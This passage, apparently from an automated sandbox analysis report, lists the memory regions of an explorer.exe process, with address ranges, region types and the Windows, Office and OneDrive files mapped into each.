= "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 659 start_va = 0x7e00000 end_va = 0x7e02fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 660 start_va = 0x7e10000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e10000" filename = "" Region: id = 661 start_va = 0x7e90000 end_va = 0x7e90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 662 start_va = 0x7ea0000 end_va = 0x7ea0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 663 start_va = 0x7ec0000 end_va = 0x7ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ec0000" filename = "" Region: id = 664 start_va = 0x7ed0000 end_va = 0x7f17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ed0000" filename = "" Region: id = 665 start_va = 0x7f20000 end_va = 0x80d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 666 start_va = 0x80e0000 end_va = 0x815ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080e0000" filename = "" Region: id = 667 start_va = 0x8160000 end_va = 0x825ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 668 start_va = 0x8270000 end_va = 0x82effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 669 start_va = 0x82f0000 end_va = 0x836ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082f0000" filename = "" Region: id = 670 start_va = 0x83a0000 end_va = 0x83a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000083a0000" filename = "" Region: id = 671 start_va = 0x83b0000 end_va = 0x83b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000083b0000" filename = "" Region: id = 672 start_va = 0x83c0000 end_va = 0x83c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000083c0000" filename = "" Region: id = 673 start_va = 0x83d0000 end_va = 0x83d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000083d0000" filename = "" Region: id = 674 start_va = 0x83e0000 end_va = 0x83e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 675 start_va = 0x83f0000 end_va = 0x846ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083f0000" filename = "" Region: id = 676 start_va = 0x8470000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 677 start_va = 0x8580000 end_va = 0x858ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008580000" filename = "" Region: id = 678 start_va = 0x85f0000 end_va = 0x89effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 679 start_va = 0x89f0000 end_va = 0x8beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089f0000" filename = "" Region: id = 680 start_va = 0x8bf0000 end_va = 0x8ceffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 681 start_va = 0x8cf0000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cf0000" filename = "" Region: id = 682 start_va = 0x8d70000 end_va = 0x8deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d70000" filename = "" Region: id = 683 start_va = 0x8df0000 end_va = 0x8e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008df0000" filename = "" Region: id = 684 start_va = 0x8e70000 end_va = 0x8ff7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 685 start_va = 0x90f0000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 686 start_va = 0x9170000 end_va = 0x926ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 687 start_va = 0x9270000 end_va = 0x936ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 688 start_va = 0x93f0000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 689 start_va = 0x94f0000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094f0000" filename = "" Region: id = 690 start_va = 0x95f0000 end_va = 0x966ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095f0000" filename = "" Region: id = 691 start_va = 0x9670000 end_va = 0x976ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 692 start_va = 0x9770000 end_va = 0x986ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 693 start_va = 0x9870000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 694 start_va = 0x9970000 end_va = 0x99effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009970000" filename = "" Region: id = 695 start_va = 0x99f0000 end_va = 0x9ee1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099f0000" filename = "" Region: id = 696 start_va = 0x9ef0000 end_va = 0x9feffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 697 start_va = 0xa4f0000 end_va = 0xa56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4f0000" filename = "" Region: id = 698 start_va = 0xa570000 end_va = 0xa5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a570000" filename = "" Region: id = 699 start_va = 0xa6f0000 end_va = 0xa76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a6f0000" filename = "" Region: id = 700 start_va = 0xa770000 end_va = 0xa7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a770000" filename = "" Region: id = 701 start_va = 0xa7f0000 end_va = 0xa86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7f0000" filename = "" Region: id = 702 start_va = 0xa870000 end_va = 0xa8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a870000" filename = "" Region: id = 703 start_va = 0xa970000 end_va = 0xaa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a970000" filename = "" Region: id = 704 start_va = 0xaa70000 end_va = 0xaa71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aa70000" filename = "" Region: id = 705 start_va = 0xaa80000 end_va = 0xaa80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa80000" filename = "" Region: id = 706 start_va = 0xaa90000 end_va = 0xaa91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aa90000" filename = "" Region: id = 707 start_va = 0xaaa0000 end_va = 0xaaa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aaa0000" filename = "" Region: id = 708 start_va = 0xaab0000 end_va = 0xaab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aab0000" filename = "" Region: id = 709 start_va = 0xaac0000 end_va = 0xaac1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aac0000" filename = "" Region: id = 710 start_va = 0xaad0000 end_va = 0xaad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aad0000" filename = "" Region: id = 711 start_va = 0xab70000 end_va = 0xad6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab70000" filename = "" Region: id = 712 start_va = 0xad70000 end_va = 0xb56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad70000" filename = "" Region: id = 713 start_va = 0xb670000 end_va = 0xb6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b670000" filename = "" Region: id = 714 start_va = 0xb770000 end_va = 0xb7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 715 start_va = 0xb7f0000 end_va = 0xb86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7f0000" filename = "" Region: id = 716 start_va = 0xb870000 end_va = 0xb8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b870000" filename = "" Region: id = 717 start_va = 0xbc70000 end_va = 0xbceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc70000" filename = "" Region: id = 718 start_va = 0xbcf0000 end_va = 0xbd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bcf0000" filename = "" Region: id = 719 start_va = 0xbd70000 end_va = 0xbdeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 720 start_va = 0xbf70000 end_va = 0xbfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bf70000" filename = "" Region: id = 721 start_va = 0xc070000 end_va = 0xc561fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c070000" filename = "" Region: id = 722 start_va = 0xc570000 end_va = 0xcf6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c570000" filename = "" Region: id = 723 start_va = 0xcf70000 end_va = 0xfb8dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 724 start_va = 0xfd70000 end_va = 0xfdeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd70000" filename = "" Region: id = 725 start_va = 0x10070000 end_va = 0x100effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 726 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 727 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 728 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 729 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 730 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 731 start_va = 0x7ff7004d0000 end_va = 0x7ff700917fff monitored = 0 entry_point = 0x7ff70056e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 732 start_va = 0x7ff865420000 end_va = 0x7ff865573fff monitored = 0 entry_point = 0x7ff865427d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 733 start_va = 0x7ff867ba0000 end_va = 0x7ff86886cfff monitored = 0 entry_point = 0x7ff867cee880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 734 start_va = 0x7ff86a6a0000 end_va = 0x7ff86a73bfff monitored = 0 entry_point = 0x7ff86a6f96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 735 start_va = 0x7ff86a740000 end_va = 0x7ff86aa85fff monitored = 0 entry_point = 0x7ff86a748530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 736 start_va = 0x7ff86aa90000 end_va = 0x7ff86ac4ffff monitored = 0 entry_point = 0x7ff86aa99e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 737 start_va = 0x7ff86ac50000 end_va = 0x7ff86acf2fff monitored = 0 entry_point = 0x7ff86ac64810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 738 start_va = 0x7ff86ad00000 end_va = 0x7ff86ad08fff monitored = 0 entry_point = 0x7ff86ad01b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 739 start_va = 0x7ff86ad10000 end_va = 0x7ff86af52fff monitored = 0 entry_point = 0x7ff86ad136c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 740 start_va = 0x7ff86af60000 end_va = 0x7ff86afe7fff monitored = 0 entry_point = 0x7ff86af74510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 741 start_va = 0x7ff86aff0000 end_va = 0x7ff86b03ffff monitored = 0 entry_point = 0x7ff86affbe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 742 start_va = 0x7ff86b040000 end_va = 0x7ff86b081fff monitored = 0 entry_point = 0x7ff86b042230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 743 start_va = 0x7ff86b090000 end_va = 0x7ff86b108fff monitored = 0 entry_point = 0x7ff86b0922d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 744 start_va = 0x7ff86b110000 end_va = 0x7ff86b18afff monitored = 0 entry_point = 0x7ff86b113af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 745 start_va = 0x7ff86b190000 end_va = 0x7ff86b2e9fff monitored = 0 entry_point = 0x7ff86b194610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 746 start_va = 0x7ff86b2f0000 end_va = 0x7ff86b4edfff monitored = 0 entry_point = 0x7ff86b2f16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 747 start_va = 0x7ff86b4f0000 end_va = 0x7ff86b553fff monitored = 0 entry_point = 0x7ff86b4f6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 748 start_va = 0x7ff86b950000 end_va = 0x7ff86b99ffff monitored = 0 entry_point = 0x7ff86b981220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 749 start_va = 0x7ff86e980000 end_va = 0x7ff86e9bdfff monitored = 0 entry_point = 0x7ff86e989650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 750 start_va = 0x7ff870150000 end_va = 0x7ff8701c6fff monitored = 0 entry_point = 0x7ff870152af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 751 start_va = 0x7ff8715e0000 end_va = 0x7ff8715edfff monitored = 0 entry_point = 0x7ff8715e1da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 752 start_va = 0x7ff8715f0000 end_va = 0x7ff871606fff monitored = 0 entry_point = 0x7ff8715f2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 753 start_va = 0x7ff871610000 end_va = 0x7ff87161ffff monitored = 0 entry_point = 0x7ff8716178e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 754 start_va = 0x7ff8717e0000 end_va = 0x7ff8717fefff monitored = 0 entry_point = 0x7ff8717e37e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 755 start_va = 0x7ff871800000 end_va = 0x7ff871878fff monitored = 0 entry_point = 0x7ff8718076a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 756 start_va = 0x7ff871ab0000 end_va = 0x7ff871ac3fff monitored = 0 entry_point = 0x7ff871ab3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 757 start_va = 0x7ff871b60000 end_va = 0x7ff871b7dfff monitored = 0 entry_point = 0x7ff871b6ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 758 start_va = 0x7ff872470000 end_va = 0x7ff87247bfff monitored = 0 entry_point = 0x7ff8724735c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 759 start_va = 0x7ff872480000 end_va = 0x7ff872628fff monitored = 0 entry_point = 0x7ff8724d4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 760 start_va = 0x7ff873960000 end_va = 0x7ff8739bbfff monitored = 0 entry_point = 0x7ff873977190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 761 start_va = 0x7ff8739c0000 end_va = 0x7ff873a56fff monitored = 0 entry_point = 0x7ff8739cddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 762 start_va = 0x7ff873a60000 end_va = 0x7ff873a6bfff monitored = 0 entry_point = 0x7ff873a614b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 763 start_va = 0x7ff873af0000 end_va = 0x7ff873b11fff monitored = 0 entry_point = 0x7ff873af2580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 764 start_va = 0x7ff873b20000 end_va = 0x7ff873cd7fff monitored = 0 entry_point = 0x7ff873b8e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 765 start_va = 0x7ff873ce0000 end_va = 0x7ff873d27fff monitored = 0 entry_point = 0x7ff873cea430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 766 start_va = 0x7ff873d30000 end_va = 0x7ff873d55fff monitored = 0 entry_point = 0x7ff873d45cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 767 start_va = 0x7ff873d60000 end_va = 0x7ff873d8afff monitored = 0 entry_point = 0x7ff873d64240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 768 start_va = 0x7ff873d90000 end_va = 0x7ff873da5fff monitored = 0 entry_point = 0x7ff873d91d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 769 start_va = 0x7ff873db0000 end_va = 0x7ff873de6fff monitored = 0 entry_point = 0x7ff873db20a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 770 start_va = 0x7ff873df0000 end_va = 0x7ff873e8dfff monitored = 0 entry_point = 0x7ff873e39d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 771 start_va = 0x7ff873e90000 end_va = 0x7ff873ea6fff monitored = 0 entry_point = 0x7ff873e9c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 772 start_va = 0x7ff873eb0000 end_va = 0x7ff8740c3fff monitored = 0 entry_point = 0x7ff873eb1000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 773 start_va = 0x7ff8740d0000 end_va = 0x7ff87435dfff monitored = 0 entry_point = 0x7ff8741a0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 774 start_va = 0x7ff874360000 end_va = 0x7ff874369fff monitored = 0 entry_point = 0x7ff874361350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 775 start_va = 0x7ff874370000 end_va = 0x7ff87445efff monitored = 0 entry_point = 0x7ff8743929cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 776 start_va = 0x7ff874460000 end_va = 0x7ff874505fff monitored = 0 entry_point = 0x7ff8744aefec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 777 start_va = 0x7ff874510000 end_va = 0x7ff87469efff monitored = 0 entry_point = 0x7ff8745201d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 778 start_va = 0x7ff8746a0000 end_va = 0x7ff8746acfff monitored = 0 entry_point = 0x7ff8746a1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 779 start_va = 0x7ff8746b0000 end_va = 0x7ff8746fcfff monitored = 0 entry_point = 0x7ff8746c7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 780 start_va = 0x7ff874700000 end_va = 0x7ff87474afff monitored = 0 entry_point = 0x7ff874711590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 781 start_va = 0x7ff874750000 end_va = 0x7ff874775fff monitored = 0 entry_point = 0x7ff874751cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 782 start_va = 0x7ff874780000 end_va = 0x7ff87485afff monitored = 0 entry_point = 0x7ff8747928b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 783 start_va = 0x7ff874860000 end_va = 0x7ff8748e5fff monitored = 